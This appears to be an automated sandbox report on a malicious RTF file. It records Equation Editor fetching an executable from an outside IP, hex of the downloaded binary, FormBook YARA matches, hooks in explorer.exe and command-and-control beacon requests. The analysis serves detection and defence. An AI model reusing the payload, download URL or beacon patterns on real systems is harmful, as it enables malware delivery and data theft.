                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a..............0..>...........[... ...`....@.. ....................................@.................................l[..O....`..H............................................................................ ............... ..H............text....<... ...>.................. ..`.rsrc...H....`.......@..............@..@.reloc...............H..............@..B.................[......H........H...!..........|j................................................s....}.....s ...}.....(!....(.....{.....o"...*.0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(*...-...........o.....*..................{....o+....{....o,...o-.....}....*.0..)........{.........(....t......|......(...+...3.*....0..)........{.........(0...t......|......(...+...3.*....0..........

                                                            Static File Info

                                                            General

                                                            File type:Rich Text Format data, unknown version
                                                            Entropy (8bit):4.083855353458583
                                                            TrID:
                                                            • Rich Text Format (5005/1) 55.56%
                                                            • Rich Text Format (4004/1) 44.44%
                                                            File name:3nkW4MtwSD.rtf
                                                            File size:22268
                                                            MD5:5aad2b6635b3069402aaf6ff389bea64
                                                            SHA1:a8617ddffd6c934fcf3f64c6e84b1a23ffa9d092
                                                            SHA256:718dcc870c0de487595feed4e5e43dc70fba6fa2aaac15462c0ba5c20028e7bd
                                                            SHA512:2bcdcc3775f8d2a163b8b564232a5839fe625b8ab7f8b6de613b57abf436e6acb095d5bc2a081e966aa4422a9edb9a81df031d4da40add21cef4404aa45a5d3d
                                                            SSDEEP:384:hPD5SVOnYJqhGw3DUDFoI/QzRckPc/4XHry8MVxAy7aD+e:hPD5SInYEhGwGFoIcluHVxB7a
                                                            File Content Preview:{\rtf6611&-+4!?7$>|.|:+%]_.!4#&.2`(2.?1-..+|$>=8+.030+4*?%/+~,<667<???%)/|>!|!.%|^?`.3'?|8-)?'%%$6^;,?%7.$?983(2(+?.?|=.8?8|*7,!5_^]5|7,[??3.!.0')?8.?6&53.;`'?/2%??41?%_+*`)%^-*&>,96(.[~3?2.=,`78)!%?81^)736.@[_?.67%?+-&:@??=>0>;3)?.+0]=?~?_?]?$82;@%7=~<3!

                                                            File Icon

                                                            Icon Hash:e4eea2aaa4b4b4a4

                                                            Static RTF Info

                                                            Objects

                                                            IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                            000000B6Chno
                                                            100000B35hno

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                            11/25/21-17:25:23.079817TCP1201ATTACK-RESPONSES 403 Forbidden804916634.102.136.180192.168.2.22
                                                            11/25/21-17:25:43.645796TCP1201ATTACK-RESPONSES 403 Forbidden804916734.102.136.180192.168.2.22

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 25, 2021 17:23:57.693909883 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:57.811109066 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:57.811188936 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:57.811558008 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:57.931919098 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:57.931982994 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:57.932010889 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:57.932039022 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:57.932213068 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:57.932466984 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.049350023 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.049417019 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.049448013 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.049487114 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.049524069 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.049561977 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.049599886 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.049638033 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.049710989 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.049772024 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.049779892 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.166820049 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.166877985 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.166917086 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.166955948 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.166992903 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167032003 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167072058 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167109013 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167148113 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167171001 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.167187929 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167207956 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.167215109 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.167227983 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167258978 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.167267084 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167293072 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.167304993 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167326927 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.167346001 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167352915 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.167386055 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167412043 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.167422056 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.167445898 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.167480946 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.170453072 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.284533978 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284571886 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284585953 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284596920 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284611940 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284627914 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284641981 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284657955 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284672022 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284687996 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284703970 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284718990 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284734964 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284749985 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284765005 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284781933 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284796000 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284811974 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284826994 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284842014 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284847975 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.284872055 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284884930 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.284892082 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.284892082 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284909010 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.284914017 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.284919024 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.284928083 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284946918 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284957886 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.284965992 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284976006 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.284985065 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.284992933 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.285003901 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.285022020 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.285032034 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.285038948 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.285043955 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.285058022 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.285073996 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.285075903 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.285088062 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.285094976 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.285135984 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.285145044 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.287367105 CET4916580192.168.2.22198.46.199.153
                                                            Nov 25, 2021 17:23:58.402185917 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402247906 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402287006 CET8049165198.46.199.153192.168.2.22
                                                            Nov 25, 2021 17:23:58.402324915 CET8049165198.46.199.153192.168.2.22

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 25, 2021 17:25:22.871083021 CET5216753192.168.2.228.8.8.8
                                                            Nov 25, 2021 17:25:22.928951025 CET53521678.8.8.8192.168.2.22
                                                            Nov 25, 2021 17:25:43.451653957 CET5059153192.168.2.228.8.8.8
                                                            Nov 25, 2021 17:25:43.503045082 CET53505918.8.8.8192.168.2.22
                                                            Nov 25, 2021 17:26:03.897233963 CET5780553192.168.2.228.8.8.8
                                                            Nov 25, 2021 17:26:04.095473051 CET53578058.8.8.8192.168.2.22

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            Nov 25, 2021 17:25:22.871083021 CET192.168.2.228.8.8.80xc18cStandard query (0)www.mountfrenchlodge.netA (IP address)IN (0x0001)
                                                            Nov 25, 2021 17:25:43.451653957 CET192.168.2.228.8.8.80x9c63Standard query (0)www.cuteprofessionalscrubs.comA (IP address)IN (0x0001)
                                                            Nov 25, 2021 17:26:03.897233963 CET192.168.2.228.8.8.80x30e0Standard query (0)www.troddu.comA (IP address)IN (0x0001)

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            Nov 25, 2021 17:25:22.928951025 CET8.8.8.8192.168.2.220xc18cNo error (0)www.mountfrenchlodge.netmountfrenchlodge.netCNAME (Canonical name)IN (0x0001)
                                                            Nov 25, 2021 17:25:22.928951025 CET8.8.8.8192.168.2.220xc18cNo error (0)mountfrenchlodge.net34.102.136.180A (IP address)IN (0x0001)
                                                            Nov 25, 2021 17:25:43.503045082 CET8.8.8.8192.168.2.220x9c63No error (0)www.cuteprofessionalscrubs.comcuteprofessionalscrubs.comCNAME (Canonical name)IN (0x0001)
                                                            Nov 25, 2021 17:25:43.503045082 CET8.8.8.8192.168.2.220x9c63No error (0)cuteprofessionalscrubs.com34.102.136.180A (IP address)IN (0x0001)
                                                            Nov 25, 2021 17:26:04.095473051 CET8.8.8.8192.168.2.220x30e0No error (0)www.troddu.comtroddu.comCNAME (Canonical name)IN (0x0001)
                                                            Nov 25, 2021 17:26:04.095473051 CET8.8.8.8192.168.2.220x30e0No error (0)troddu.com162.240.31.112A (IP address)IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • 198.46.199.153
                                                            • www.mountfrenchlodge.net
                                                            • www.cuteprofessionalscrubs.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.2249165198.46.199.15380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 25, 2021 17:23:57.811558008 CET0OUTGET /70007/vbc.exe HTTP/1.1
                                                            Accept: */*
                                                            Accept-Encoding: gzip, deflate
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                            Host: 198.46.199.153
                                                            Connection: Keep-Alive
                                                            Nov 25, 2021 17:23:57.931919098 CET1INHTTP/1.1 200 OK
                                                            Date: Thu, 25 Nov 2021 16:23:57 GMT
                                                            Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.25
                                                            Last-Modified: Thu, 25 Nov 2021 02:23:58 GMT
                                                            ETag: "b4a00-5d193aabff887"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 739840
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-msdownload
                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 be f3 9e 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 3e 0b 00 00 0a 00 00 00 00 00 00 be 5b 0b 00 00 20 00 00 00 60 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 5b 0b 00 4f 00 00 00 00 60 0b 00 48 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 3c 0b 00 00 20 00 00 00 3e 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 48 06 00 00 00 60 0b 00 00 08 00 00 00 40 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0b 00 00 02 00 00 00 48 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 5b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 d0 21 01 00 03 00 00 00 8c 01 00 06 7c 6a 02 00 f0 f0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 2e 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 02 00 00 11 02 7b 07 00 00 04 0a 06 0b 07 03 28 30 00 00 0a 74 04 00 00 02 0c 02 7c 07 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 1b 30 03 00 f9 00 00 00 03 00 00 11 02 7b 03 00 00 04 6f 23
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELa0>[ `@ @l[O`H H.text< > `.rsrcH`@@@.relocH@B[HH!|js}s }(!({o"*0(}-}+T{o#o$,{o#o%}+(s&}{o#{o'({,6{o(+()((*-o*{o+{o,o-}*0){(.t|(+3*0){(0t|(+3*0{o#


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.224916634.102.136.18080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 25, 2021 17:25:22.961991072 CET785OUTGET /9gr5/?gvT8Z=xQZabMU8dpACe7vSnuiwD/QS3vczr7oZL8st36+z5QOTIlaedyvl1J6mLYwfvajeV4x6zA==&wrx=KX64Xbs0GT8 HTTP/1.1
                                                            Host: www.mountfrenchlodge.net
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Nov 25, 2021 17:25:23.079817057 CET785INHTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Thu, 25 Nov 2021 16:25:23 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "6192576d-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.224916734.102.136.18080C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 25, 2021 17:25:43.527704000 CET786OUTGET /9gr5/?gvT8Z=ywSUfm2fQGK6UvQCK3y+m09HhIkd7Ec2I38ZOQmE/hAglw7BpPTyU9WfPvviQ4VjNkYSbA==&wrx=KX64Xbs0GT8 HTTP/1.1
                                                            Host: www.cuteprofessionalscrubs.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Nov 25, 2021 17:25:43.645796061 CET787INHTTP/1.1 403 Forbidden
                                                            Server: openresty
                                                            Date: Thu, 25 Nov 2021 16:25:43 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 275
                                                            ETag: "6192576d-113"
                                                            Via: 1.1 google
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                            Code Manipulations

                                                            User Modules

                                                            Hook Summary

                                                            Function NameHook TypeActive in Processes
                                                            PeekMessageAINLINEexplorer.exe
                                                            PeekMessageWINLINEexplorer.exe
                                                            GetMessageWINLINEexplorer.exe
                                                            GetMessageAINLINEexplorer.exe

                                                            Processes

                                                            Process: explorer.exe, Module: USER32.dll
                                                            Function NameHook TypeNew Data
                                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE5
                                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE5
                                                            GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE5
                                                            GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE5

                                                            Statistics

                                                            Behavior

                                                            Click to jump to process

                                                            System Behavior

                                                            General

                                                            Start time:17:24:12
                                                            Start date:25/11/2021
                                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                            Imagebase:0x13f420000
                                                            File size:1423704 bytes
                                                            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:17:24:14
                                                            Start date:25/11/2021
                                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                            Imagebase:0x400000
                                                            File size:543304 bytes
                                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high

                                                            General

                                                            Start time:17:24:17
                                                            Start date:25/11/2021
                                                            Path:C:\Users\Public\vbc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\Public\vbc.exe"
                                                            Imagebase:0x1090000
                                                            File size:739840 bytes
                                                            MD5 hash:075BD1E3E3E0C01794EE6A84BE2C585A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:.Net C# or VB.NET
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.415205594.000000000256D000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.415174262.0000000002551000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.415523369.0000000003559000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            Reputation:low

                                                            General

                                                            Start time:17:24:20
                                                            Start date:25/11/2021
                                                            Path:C:\Users\Public\vbc.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\Public\vbc.exe
                                                            Imagebase:0x1090000
                                                            File size:739840 bytes
                                                            MD5 hash:075BD1E3E3E0C01794EE6A84BE2C585A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.413230327.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.412873082.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.482437472.0000000000370000.00000040.00020000.sdmp, Author: Joe Security
